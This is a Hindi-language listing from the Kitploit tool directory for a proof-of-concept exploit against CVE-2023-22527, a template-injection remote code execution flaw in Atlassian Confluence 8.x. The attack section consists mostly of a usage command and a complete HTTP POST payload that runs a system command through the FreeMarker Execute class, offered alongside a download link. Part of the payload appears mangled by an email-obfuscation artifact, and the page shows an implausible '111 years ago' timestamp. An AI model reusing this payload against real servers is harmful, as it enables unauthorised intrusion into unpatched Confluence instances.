Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-22527 — CVE-2023-22527 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Atlassian Confluence में एक सर्वर-साइड टेम्पलेट इंजेक्शन (SSTI) भेद्यता है, जो क्राफ्टेड HTTP अनुरोधों के माध्यम से रिमोट कोड निष्पादन को सक्षम बनाती है। | Kitploit
उपकरण/GitHubGitHub/kh4sh3i/cve-2023-22527
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubkh4sh3i/cve-2023-22527

CVE-2023-22527

CVE-2023-22527 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Atlassian Confluence में एक सर्वर-साइड टेम्पलेट इंजेक्शन (SSTI) भेद्यता है, जो क्राफ्टेड HTTP अनुरोधों के माध्यम से रिमोट कोड निष्पादन को सक्षम बनाती है।

रिपॉजिटरी देखें
111 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें



CVE-2023-22527

CVE-2023-22527 | Confluence में SSTI का उपयोग करके RCE

विवरण

  • CVE-2023-22527 फ्रीमार्कर इंजन में एक सर्वर-साइड टेम्पलेट इंजेक्शन भेद्यता को संदर्भित करता है जो उपयोगकर्ताओं को वेबसर्वर पर कमांड निष्पादित करने की अनुमति देता है।
  • यह कोड CVE-2023-22527 के शोषण के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) स्क्रिप्ट है, जिसे Atlassian Confluence में एक सर्वर-साइड टेम्पलेट इंजेक्शन (SSTI) भेद्यता के रूप में वर्णित किया गया है।

उपयोग

python3 CVE-2023-22527.py -u  http://target.com

पेलोड

POST /template/aui/text-inline.vm HTTP/1.1
Host: 127.0.0.1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 278

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&[email protected]@getResponse().getWriter().write((new freemarker.template.utility.Execute()).exec({"id"}))

प्रभावित संस्करण

8.0.x
8.1.x
8.2.x
8.3.x
8.4.x
8.5.0-8.5.3

संदर्भ

  • projectdiscovery
टूल डाउनलोड करें